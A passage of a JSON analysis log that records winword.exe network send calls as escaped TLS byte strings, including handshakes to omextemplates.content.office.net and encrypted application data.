  564.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0107z\\x8e\\xdep\\x94h\\x15m\\xfc\\xb7\\x1f3\\x8b\\x87\\xc8\\xf4\\xc2@j\\x13\\xa6cs`\\x93\\xe9\\xc1\\x03\\x1c\\xdel\\xf8k\\xd9\\x10mc6\\x0b{\\x06\\xda\\xf7\\xdc\\xcf\\x8a\\x80\\xff (f\\xde\\xee\\xda\\x893#\\xd4\r\\x05#\\xf5\\xe0\\x8bq\\xc1u\\x80\\xc15'[\\x1b]%\\x00a|\\xb5\\xcf,9\\x8fz\\x1bv\\x90\\xb4\\x8anz\\x96\\xd3\\x9e>=j\\xaf`!\\xae\\xa3d\\x9f\\x1a\\x86\\x00\\x11\\xb6\\xa2\\x81m\\x9fv,y\\xadr\\xd6tx`\\xdf:\\x89zw\\xad\\xf7eyd\\x18\\xf1\\xc1\\x01\\xab\\xf7:\\x8c\t\\xdb\\x98\\xfd\\xd8u%\\x914\\xf87\\xb2\\xb7\\x8a\\x1d0\\xf5?\\x12\\x17\\xac\\xd1g,\\x85|$\\xe9\\x82z\\xa7\\xd63f\\x18\\xad\\xa0\\x83\\x0ci\\x87e\\xcb\\x13\\x81\\x9e\\xec\\xc1k1\\x10\\x85\\xbf\\x93\\x82\\x06\\xd9\\xd8\\x13[\\x82\\xf8d\\x80\\x08m\\x97o-\\xd1\\x1e<y~*\\xc41\\xd1\\x98j\\xb14\\xb5\\xcdb~\\xa6\\xa2\\xba\\x12\\xc3v6\\x91\\xcc\\x15\\x95\\xd1\\xe3\\xb20\\x9bt~t\\xa7\\xc0\\x9c\\xfe\\xf0"
  565.             },
  566.             {
  567.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x045\\xa7\\xd6\\x0cp\\xe5\\xa2p\\x7f.\\xb2_\\x1a\\xa3x\\xd7~a<\\x0c\\xae\\x02\\x0f]\\xdct\\xe8\\xe4g\\xa5$\\xe6\\xce\\xd6\\xca\\xe9\\xb0\\xe5\\xffjr\\xfa>\\xbf\\xc2\\x86\\xe4[j\\x85\\xe5\\xa00\\xaf\\xb5|\\xde\\xbe\\xb8\\xda\\xea\\x89\\xecx\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000w\\xf3\\xca\\x01\\xc1\\xcb\\x8ay\\x97\\x01a\\x1b\\xfd\\xef34z\\xfb\\xccf~\\xf0\t\\xb7\\xbfh\\x01x\\xe3\\xff\\xcbf\\x0f\\xf2\\x96tv\\x82\\xf0\\xa6:t\\xc71/f@}"
  568.             },
  569.             {
  570.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04{\\xf0a'\\xf2\\xb7\\xe2\\xf9\\x8f\\xc5o\\xee\\x087mb3r\\xc2\\xe3w\\x1e9\\x83;1\\xfa\\xd0\\x81n{x\\xc6\\xccp\\x00\\xf2f\\xf5\\x98\\x0f\\xae|\\xb6\\x16u<\\x97h\\x07\\x8e\\xe9<7hg\\x1dxb\\xf8x\\xe4x\\xd3\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x82\\xa3%i\\xdaq\\xd1\\x88\\xbd\"?`\\xc2\n\\x86\\x94\\x90\\xe9\\xff\\xbb\\x14\\x14\\x8f\\xbc\\xdf\\x0f9\\xc8\\xfb#p\\xfe\\x00\\xbd\\xd6\\xb0\\xdc\\xf2\\xaa\\x91\\x055m\\x12\\xab\\xa32\\xc5"
  571.             },
  572.             {
  573.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}!\\x84\\x1f\\x99\\xd4\\xc5\\xa4s\\xca+\\x91\\xc4q\\x93ln\\x80\\x85\\xce\\xf0\\xba#}\\x96m!\\x85\\xa7\\x03\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  574.             },
  575.             {
  576.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}!\\x96\\xc7i\\xd5\\xfb\\xa1\\xad\\xc4\"\\x92ed\\xd1\\x04\\xdf)ys]\\x12\\xac\\xfc g^\\xe2\\x16u\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  577.             },
  578.             {
  579.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t} \\x98\\x92\\x91\\x19\\x14\\xeb\\x8fx\\xaei\\xee\\xc8b\\xc1\\xfc\\x02d\\xba\\x11\\xfa\\xf3\\x92\\x97\\x95v-\\x9b\\x1a\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  580.             },
  581.             {
  582.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t} m\\xbf8\n0\\xe2\\x1f0\\x16\\xd3\\xdd\\xaf\\xb0\\x83\\xf5\\xa9j\\xa0\\xce/\\xd6\n\\xcc\\xa0\\xfac\\x9d\\xe9\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  583.             },
  584.             {
  585.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t} \\x12b\\xbd\\xce\\x8e\\xac\\xc7\\xc4\\xe3m%\\xc8'\r\\xe0\\xa5\\xea\\x94>\\xf6\\x85\\x9cmv?1[e\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  586.             },
  587.             {
  588.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04m\\x95t0\\xa3\\xbc\\xb5\\xf7\\x8e\\xa5\\xa6;udi\\xa3\\xf7\\x159`\\xde\\xe6\\x0bf\\xa8c\\xc92\\xaek\\xb9\\xa0\\xc6\\x18be\\xe7\\x9b$x\\xa5+\\x01\\x83\\xd6\\xd4/\\xeb\\xdb\\xa5ll#>\\xb4\\x8bk\\xd2\\xb8\\x85!gvt\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000m\\xa3crdu\\x921?\\x8fqsa\\xbe\\xd0\\xf1\\x95#\\xa5z\\xb1}\\xbe\\x9dh\\xa2\\x18vi\\xca\"\\xfa\\xf9\\xf6\\xe6\\xeb\\xb6\\xcf\\xa5\\xb1\\x929\\xbfm;\\x15a\\xcb"
  589.             },
  590.             {
  591.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04j\"?+\\xc9w\\x9es\\x9e\\x10\\x8es`-_\\xbb\\x0c\\xf7'p\\xcdp\\xec\\xc6\\xceyo\\xe5p\\x11r\\x06k\\xc6\\x9e\\x1c\\xff\\xd6\\xbd\\x1c\\xaf\\x11\\xc4zdb\\x1a\\xdb\\xb0\\x89\\xabmm3\\xff\\xdd\\xff\\xf0wz\\x9b8\\x82\n\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000cf\\xa5\\x9d\\x1c7\\x87\\x8e!s\\xf7\\x8e\\x0e\\xdf\\xc6\\xfet^\\xc9:\\x90@\\xda/yor\\xb7\\xa4\\xe6\\xf8\\xa7qs\\xe1\\xa4\\xfd\\x17\\x01\\xce\\x81[\\x0b\\x0b\\xdb\\xb0m\\x90"
  592.             },
  593.             {
  594.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc8\\xae\\x9d\\xf2\\x93\\xabu\\x1a\\xc8\\xf4\\x9b\\x7f<x\\x87\\x9cj;xwg\\x93\\xbbr\\x17v\\x04\\x11o\\xee\\xd3d6\\x82\\xbd8\\x80\\x8an\\x96\\x1b\\x7f\\xe9\\xe5\\xfa\\xcf\\xa0on\\xb6\\x95\\xa1\\xa44\\xa8_\\xca\\xb88h\\xf3\\xfc\\xb4\\xf3\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000}s\\x10^\\x15\\x0f\n\r\\xbe_\\xdf\\xc5o\\x05\\xb1\\xc4\\xaat\\x7f\\xdf\\x1d\\xde\\xef\\x8f\\x07*\\x8ca h\\x86x\\xca\\xd9.\\x84\\xccxdx=\\x9a\\xb5\\x90\\x9a1\\x08\\x1f"
  595.             },
  596.             {
  597.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04l\\xd5%n\\xed|-|>1\\xf6\\xa5\\xbe\\x1a\\xca\\xfe\\x90\\x8f-m\\x13\\xb8\\xe2\\xb9qw\\xb4?\\xeal\\xbd\\xeb\\x15b\\xbf\\xa7\\xbag\\x9c\\x91\\x0b\\x95\\x9a\\x89\\x0e=l~`&\\xb8\\xdd\\xc4=b\\xb5n\\xb7\\x0f\\x13\\x8d\\x9d\\x15\\x9a\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xbf\\xb5\\xef\\xb4\\x1eu\\xaf)4:\\x1a\\xca\\xa7\\xbb\\x13\\x1f\\x9c\\xe8\\xb6xy,\\x92s\\xbe\\xe9\\x0c\\xda8\\xe4\\x11\\xa3\\xc8\\xc4c\\xa4\\x17\\xd4\\xba\\x95\\xe5%\\xb4v\r\\xa7\\x17\\xb7"
  598.             },
  599.             {
  600.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}!q\\xe7\\x94\\x96x\\xa1\\x13\\xcbz\\xdb<\\x98\\xc4s\\xc0m{\\xd8v\\x08\\xb7b\\xd6\r\\xd0w\\x13\\xed\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  601.             },
  602.             {
  603.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x8c\\xa3\\x9b\\xf4\\xf6o\\x07j\\x7fo\\xd4\\xd5z\\xe7\\xb9\\x10g\\xa7/\\x07\\x9f\\xc1o\\x95\\xc8\\x90&l\\x0b\\x1a\\xbc\\x17\\xc6\\\\x9a\\xc3\\xf7~\\xbf8\\x03=fi&v\\hn\\xb7\\xa0!\\xa4\\x9b(}\\xf3\\x0f\\xa0v\\xb7x\\xde\\xb6\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa9\\xdeai5=\\xb8\\xfe\\x8c\\xd9!\\x19\\xa0\\x93\\xe3x\\x9cmi\\xa9k\\x8b\\xfc\\x03\\x9a)9[\\x11\\xfc\\xbe\\xbd\\x07@\\x8f\\x1e\\xe5\\xd9\\xf7\\x7f]6\\xbd\\x04\\x97\\xf89\\xb8"
  604.             },
  605.             {
  606.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04j\\x01\\x16\\xad\\x13\\x06`\\xe9\\xd00\\xb5\\xd8/\\x8c\\xec\\x1a\\x92\\x12l\\xe7\\\\xf7\\x1b \\x10s]\\x06\\xfbq\\xb1z\\xfb\\xc5\\xf21\\x82\\xf1\\xb2\\x8d*\\xf7\\xfc\\xccs\\xa6i\\x185_ur7\\xf4\\xac\\xa9!:\\x85\\xb0\\x822y\\xd7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000b\\xbf*zaz3\\x16\\xb6\\xc5,i\\xda\\x8e{[ry&x-\\x9d\\x12\\x14w7\\xb3p(\\xb7\\xa4lv\\x90\\xf3\\xccz\\x13\\x1b\t\\xb1a,m\\x9b\\xc2\\x9b|"
  607.             },
  608.             {
  609.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xe5t\\xbf\\xee^r2\\x85\\xc2\\xc2zqb.8jy`\\x92f\\x13\\xfe5b\\xc0j\\xbe1\\xe7\\xb2x\\xe7\\x8ak\\xbc\\xf21i2\\xe61\\x13#\\xb6\\x84h\\xa3]\\xd3\\x0bz\\xea\\xcb\\xad\\j\\xa5l\\xf9\\xf9\\x8b\\xc3\\xfe\\xe6\\xed\\xd7`\\xaf'u\\xdb^\\xe2i\\xb8\r\\xf3\\xa6g\\xd9\\xf0ss\\xe8\\xe2\\xc5\\x87in\\x1b9\\xac\\xf13\\xb6\\xad\\x82m~\\x01\\x82\\xadl\\xc4\\xba4n\\x98+\\xc4\\x91\\xb2\\x888]`\\x11\\xa2\\x1b\\xbe\\xdd\\xc62\\xa6x<\\xc6y\\xa4\\x10\\xb4\\xd8\\xe4c\\xccl\\xf3.\\x9b\\xd9rj7\\xc2?\\x8e\\x88\\xd55\\xc1\\xac$0\\xaezr\\x1d;\\xfe\\x1a\\xc9\\xdd&\\xd6\\x1f\\x1f\\xcbn\\xb5\\xa2t\\xa7\\xd8\\x88w\\xf5\\xa8\\xb9\\xf0\\x88\\xbf\\x82\\xaa'\\xb3\\xd0\\x8d\\x98\\x86\\xd2\\xc1\\x8a\\xac\\x06wc\\xd8_lm\\x8d\\xfe\\x1d\\xac\\xfc\\xa09\\x88\\xc8\\xf8\\xca\\xda\\x95\\xfe)g\\x1d\\xa2)\\x8e,\\xff\\x91~\\x84\\xd4`\\xd8i`\\xeb\\x80\\x8e\\xa0\\x1c\\xaez|v!\\xf7k\tl\\xacf\\xdc\\x1eq3\\x88"
  610.             },
  611.             {
  612.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0108'\\xcbm\\xeb\\xf6:e\\x8e\\xdd]\\xe8f-\\xd0\\xaajx:\\x15\\x99m\\xd3\\xa8\\x19\\x95\\x8a\\x10\\xc9\\xc6\\xb1\\x1eu;\\x13\"a7\\x05n0\\x02\\x9b\\xc3\\xce\\x9fh\\xd1\\xf2\\x17\\xbd\\x04\\xe2{\\x91\\x81-\\x05\\xc3\\x02? \\xe3,2\\x03\\x95ip\\xe02\\x0b*}x\\xfee&q\\x9e\\x1dr\\xb4\\xd2\\xf6\\xac%~\\xf8\\x11\\xf9%k\\xbc\\xd2\\xba~\\xb7s$\\xd08l\\xec\\xbc>@\\x00\\x05\\x1cj\\xe0\\x00c!\\xbd\\x85\\xf3\\xd1\\x98|\\xac\\xb7c\\xc7\\xa2\\x8d\\xf0\\xb5\\x1c\\xa4\\xa3\\x80ev@fx\\xc0\\xa9;8\\xc80\\x8a2\\xe5\\xf7\\x80\\xb5=\\xcc\\x1d\\xf9\\xb2\\x97\\x1b\\x04\\xda\\x19\\x92.\t\\x95\\x03\\xbd\\xaa\\x06\\xea\"v92\\xa4i\\xe4\\xe6\\x16\\x0fuw\\x98\\xb9rn\\xceo\\x93*+\\xd6q+\\xb5\\x8f@\\xdc\\xb8\\x82\\xd5\\xc1@v\\x97\\xd5.\\xf1x\\xcd\\xbf\\xaf\\x95g\\xc0\\xbb&'\\x9fp@p\\xe2\\xe5\\x14]\\xf5w\\xc9\\xae\\x8b\\x18)\\xe1\\x04\\x93&\\x96\\x07\\x1a\\xb3\\x92g\\xcb\\x0cg\\xe7\\x06\\xdernh"
  613.             },
  614.             {
  615.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010g&\\xb2\\x83{\\xb4a^t\\x84\\xba\\x9f\\x8c\\x8a\\xebd\\x9d\\x9d\\xda\\xc5\\xd5[\\xd4r\\xe3\\x1b\\x1e0\\xae\\xa8\\xf4\\x7fg$\\x96\\xe4\\x17mh\\xb2>[\\xcas\\xa0\\xfe\\x05\\xa1ct\\xb1'\\x1e\"-y\\xed\r\\x0b\\xe7i\\x1b\\x8faq\"\\xfa\\xa5\\xfc\\xcco}\\xc4\\xe3\\xde)\\xd1\\xf6\\x8b?s\\xb6\\x00\\xe0\\xedd\\xcb\\x9f1\\x18\\xbe\\x14\\x82\\xfb\\x9e\\xe3\\xef\\xedc'\\xf6w\\xe6;\\x88\\x96\\xca\\xa0\\xb1sxy\\\\x10\\xe5$?\\xcd\\xb8\\xaf\\x0e\\x16\\xc4\\xaak\\xf0\\xf5o\\xc7'\\x9aw\\xb1k\\xbb\\xcc\\xec$b\\x98\\xf1\\x00\\x9a\\xb5\\xb1\\xd2\\xff\\x85\\x9e\\xe6\\xc9\\xe4\\xc2{\\xa1\\xb6:(\t\\x19xb\\xe0\\xe4\\xc0m`\\xe2\\x9f\\xe4mk0\\xbd\\xe6\\xcd\\xf6\\xcd\\xce\\xd0\\xec\\x995\\xadq\\x88\\xd7*1\\xe7\n\\x0bjf,\\x96q\\xe5y\\xf2\\xdc\\xb2\\x8a%\"\\x14~\\xee\\xcb\\x8e\\x131\\x98\\xd1t\\xe6\\xb0\\xdejy\n\\\\xbc?\\xc6\\xce\\xc2\\x8c\\xc5\\xa4\\x02{:\\xf1\\xcd\\x8c^7j\\x03\\xb01:\\x92k\\x90\\xcc\\xe1\\xec\\xa1\\x85"
  616.             },
  617.             {
  618.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010n\\x02\\xdf4\\xb6\\xb6\\xf0\\xc4mkr\\xf2z\\x96\\xdd\\xd5\\xf27\\x1f a~\\xee\\xa5r\\xbf\\x03\\x05\\xb4\\xb8\\x83\\xd4ld(\\xd7v\\xc6g\\xecw\\xbf\\x9fq$s\\xa4\\x866\\x12\\xe3\\x17\\x86\\xc4\\x86\\xabd\\xa8\\x00\\x89\\x107\\x96\\xdc\\x90\\xfb\\xab\\x7f\\xec\\xfbz\\xb9ahmiy\\x17\\xb1\\x86`\\xbe\\x96\\xc92'\\xb8\\x8d`x\\x02o\\x93\\x80\\xdb\\xa2@\\x9c\\xa5\\xd8g\\x87m\\xb6s\\xe0\\xf6\\xe1\\x14\\x16\\xf7\\xd3,\\x87\\x120\\x18]c\\x8db\\xec=\\xeftj#\\xb9\\xb0\\xf5\\x1f\\xf8\\x056]\\xe8\\x0c>bs\\x94\\xf3\\x17\nig\r\\xdac\\x9bc\\x9b1\\x1b\\xf2\\xf4\\xaft\\xe5l\\x89\\xf3\\xe4\\x05\\xce\\xb1~\\xd5 ~\\xec$\\x04\\\\xdc\r\\xc6q\\xc4\\xa8\\xcf\\xd9\\xe2\\x08\\xcfx\\xcd\\xcd\\xa3\\x86\\x8ak\\x10\\x02\\xb3\\x04\\x8c\\x85b+g\\x8fi\\xbed\\x1cx\\xb4\\xc0\n\\xc7,x\\xcda\\xde\\x83qva\\xb3\\x8a\\xf0\\xe9\\xdd\\x8f\\x13,\\xac\\xca*\\xe7\\x02\\xf5g\\x89\\xd9\\x98k\\x03w3h\\x88v1\\x87'\\x93\\x16\\x8d"
  619.             },
  620.             {
  621.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xbc{m\\xaf\\xad\\xe8\\x1am\\xdc\\x9f\\xb7\\xd9\\xfc\\xc3\\xb6d\\xa6\\xdf\\x13p\\x94\\xd56\t\\x07\\xb2\\xa5\\xbe\\x14;g\\x1a!\\xe4\\x15\\xba\\xa7\\x8f\\xd0q\t\\xd1\\xf5\\xd4\\xfcj\\x8c3w\\xf2\\xf3\\x80q\\xb7\\x87\\xaap\\x87\\xdf\\xb7er\\xe5\\x99>~\\xdf\\xc5\\x8e\\xe4r\\xba\\xa3^\\x12\\x91\\x00\\xb2&\\x80\\xa5p\te\\xac\\xc2dc(\\xab\\xdb\\x8dzh\\xfa\\xbal\\xc6k\\xc2j\\x04r\\xaey\\xa60\\x8ejl\\xa2\\x12\\x8e}\\x83\\x8eb\\xc9\\x93\\xd2\\xbd\\xe3b\\x01\\xcb\\xc8a\\x10\\xb6\\x0c\\x0e\\xb0:\\x9e(9.\\x7f\\x1e\\xf5c\\xce\\x9f\\xc2l\t\\x8e\\xb2\\xd6m\\xb0\\xa0\\xa6\\x87\\x0e\\x0fg\\xe6\\xden\\xd2\\xd7\\x96fk\r\r\\xd8\\x17\\xc6\\x9b\\x80\\x0ca`\\xa7u\\x17\\x9c\\x84\\xda\\xdb\\xda\\xd3,pz\\x8e\\x15t;\\x88\\xa1p+\\x83\\xa9kvz*?\\x890&p\\xf0\\x81\\xd4\\xfbh\\x82\\x9f\\x08\\x1a6\\xe5a\\x84\\x12y\\x9e\\x1ew\\xfe3k\\xcf\\xbdb\\xa6g\\x02p\\x14'\\xb9\\x1b\\xb0\\xa6\\x86\\x10\\xd1\\xc4\\x04t\\x1f\\x1c\\xa4\\xc3c"
  622.             },
  623.             {
  624.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb0x\\x9d\\xb8.\\xd9l\\xfe\\xcew\\xe4\\xa3\\xe8f\\xcb\\xa2\\x1a_\\x8f\\x12\\xf0l\\x8b&\\xf9\\xa4l\\x16\"\\xf5ezp\\xdcq\\x1cl\\xda0\"rq\\xee8`k\\x0e7n`hr\\xc37\\xd4\\xf2\\xdbe\\xa4`\\xd7\\\\xf5\\xcb1\\xdfh\\xd3\\x91\\xe7\\x9a\\x87k\\xd2\\xee\\xe0\\x03\\x8b\\xf8\\xbd\\xb2\\xe7\\xbe\\xe37\\xe3\\xc9\\xb1\\xf3\\x9c\\xddy\\xbf?o^\\x92u\\xfa\\x85:\\x97\\x9bdx\\xaa0t\\xf3\\xc4\\x16\\xd7\\x088\\xb5h\\x1c\\x99&\\xdd(\\x9d\\xb3\\xf4\\xf0-\\x9e|>\\xdd\\xdd^8!\\xa3;\\xe8\\x10\\x1cy\\xad\\xa7e\\x19\\xbf\\xdd!\\xd7v\\x14\\x15\\xad\\xc13 \\xa7u2\\x0c\\xe1o\\xc47=5;0\\xd6>\\xce(\\x9d\\xf7\\x81m\\x87\\x84q\\x89\\xe32\\x03\\xbd\\xb4d\\x19\\x11\\xd3\"\\xe0\\xb0\\xc5|\\x06\\x1e\\xfe6h\\x8d)\\xa9\\xdaag\\x9f\\x01n\\xf9\\xbb\\x92\\xf2\\x81z\\xe7\\x90]\\x85\\x1c\\xd9d\\xa0x\\x16\\x8e%{\\xfe1\\xc5\\xd7]\\x8e\\x97\\xb4\\x15\\x107`\\xbe\\xcb\\x8ah\\xef(7\\xb6]\\xf6\\xb2\\xe1\\xc8"
  625.             },
  626.             {
  627.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc5\\xd7\\xe7\\x95\\xe5\\xd5\\xd0-\\xfc\\xf6\\xffz\\x15\\x12r\\x1e\\xc5\\x8e\\x98\\xbe=e d\\xf1@\\xec\\x93\\xea\\xf7\\xcby,\\xb0\\xedin\\x98\\xb2\\x91\\xf0\\xe2\\xb4{\\x82fs\\x19\\xf7\\x96{\\x17\\xd6\\xf1\\xf2\n>\\xc1\\xca'f_@\\x16\\xce\\x8e\\xc2t\\xc4\\xe2\\x0b\\xd1t\\x1e\\xde\\x85\\xe0:~\\x86s\\x9c\"\\x0b\\x91\ra%\\xea\\xb0+:\\xe0w}ib\\xcd\\xd1\\xeaf\\x1c@t2i\\xfd\\xde<\\x00\"_\\xc4\\x915c\\x0c\\xc6\\x8bf\\x92\\xeac\\x8a\\xb5<x\\x93\\xf4\\xe2s5\\xe1\\xe8\\xe4\\x0e\\xa6\\\\xd4\\xb5\\xa8\\x84\\x81\\xd33\\x08\\x8a\\x81\\x90\\x08\\xc0?\\x95\\xe0\\xd7!\\x07\\x10\\xec\\xfc5q\\xf5\\x1d\\xc5v\\xd2\\xea!f)9\\x01\\xc2\\xf3\\xb5\\xe8i\\xd5\\xaaw\\xe8\\xe5\\xc9*l6\\x16ey\\xc4\\xd6' \\x95cu?\\x074>\\x97|\\x11s\\x91\\xc1\\xb6\\x04\\xdd\\xb6\\xc5\\xafojf\\xc7/e\\xd8$)\\x18\\xe4\\x96ag\"`g6\\x80&\\x8e\\xf7\\xf7\\xeb\\x893f\\xf0\\xf0g\\xf2\\xddu\\xb8\\x0f/\\x04\\x16"
  628.             },
  629.             {
  630.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x18\\xc7\\x0f\\xae\\x7fz6\\x04\\xdcl\\x9b\\x04\\x82\\x16,xt#\\x12>\\x0b\\xa7n\\xabf\\x92\\\\xe2\\x80\\xd02\\x02\\x7fw\\x820i\\xc8\\xf3hz\\x93+'\\xb3gr\\x96\\xabo\\xa8}\\xdc\\x9a\\x8cs\\x10\\x7f\\x94\\x9b\\xef.\\x19\\x9e!\\x96[\\x0b\\xde\\x9c!\\xf0~[\\xe75\\xc5\\x17\\x91m\\xab\\x19\\x02\\xe03 w:\\xd6\\x15a_yq\\x95\\x04\\xac\\x0f\\xf7d\\xa8\\x08]<\\x95\\xd7\\x13\\xcd\\xc7\\xe9\\xbf\\x85\\xef\\x9e\\x14\\x8c\\xd6\\xbc\\x82\\x0c\\x95x\\x84\\xa9[`\\xb1\\xcax\\xaf'\\xe8\\xbc\\x8bj\ra\\xccix\\xd8i\\xdc\\xcc\\xe6\\xe8t\\xe1\\xe8\\xeb\\x96o~\\xc40\\xb7\\x8b\\xc8\\xf5\\x99q\\xb1\\x15\\xd3\\xbe\\x9a\\xd4\\x0f\\x96\\xc308p\\xc8\\xb9/`f\\xda\\xe48\\xff\\xa4t(\\x04\\x00\\x8cv\\xc8j\\x8bd+\\x1d\\x8c\\xa1[\\xf0|\\x12>\\xbe\\x0c\\x7f\\x04[\\xc7w\n\\x9cu\\xfc\\x89\\xdfg)\\xe0\\xda\\x8c\\x1eo\\x90\\xe2\\xcb\\x0c\"=q\\x0ci\\x05\\xe7\\xa9\\xedj\\xday\\xe2\\xee\\xdd\\x10vb\\xddg?\\xc2\\xe3\\x1a\\x1c"
  631.             },
  632.             {
  633.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x0e#p\\x8c\\xe7b@\\x03f\\xd9!\\xca\\xec\\x1a\\xb4\\x16e\\x923\\x97\\l\\xf7\\xc1 \\xf7\\x83\\x1f\\x0c\\xc3\\x9d\\xdb\\xd8\\x8c\\xca\\xbfw\\xdbw*\\x88fai\\xa9\\xd8\\x87h\\xf0+\\xe7\\xdbt\\xa7\\xb7\\xd8k\\x0b\\x15\\x04\\xb2]t\\xaf)e\\x018\\xe9\\xe1f\\x91\\xbf\\xdd\r\\x1d\\x10^\\xf5q\\(\\xec\\x1c\\xfc\\xc0\\x90\\xe3u\\xbe\\xff~\\x0f\\xb2\\xaf\\x9ei\\x95\\xd6\\x04\\xd8\\x00\\x95\\x93h\\x1f\\xa5-b\\xaf\\xb5\\x11c\\x88g[bm\\xd5c\\x1b'\\x98\\xe1\\xe6\\xbal\\xa5bt\\xcd\\x15\"\\xc0\\x89h\\xafz\\x1b\\x10\\xfe\\x9d\\xdf\\xa7\\xb2c\\xbeu\\xbd\\xcd\\xb9\\x8el\\x9c\\xd5\\x86mom\\x8c\\xf1\\xd91\\xa5\\xa4\\xc7\\xeacd,\\xd3/\\x92\\xef\\x0f\\xb1\\x1eq\\x00^\\xb4\\xebs:p\\xd8l\\x9b\\xb0\\xc6\\xd2=\\x01(\\xc9\\xe4\\xfd6\\x12\\xbb<&\\xcd\\xd1\\x8c\\x14\\x8e*#ho\nz\\xf3!_yg\\xf3z\\x10%\\xb4n\\x01\\x8e\\xab\\xfb\\xf7\\x19\\xf9\\x01\\x92\\xfe\\xc1\\x9e7\\x0e\\xc9s\\x82\\xfc\\xf3x\n?^q\\xed\\xed\\xac"
  634.             },
  635.             {
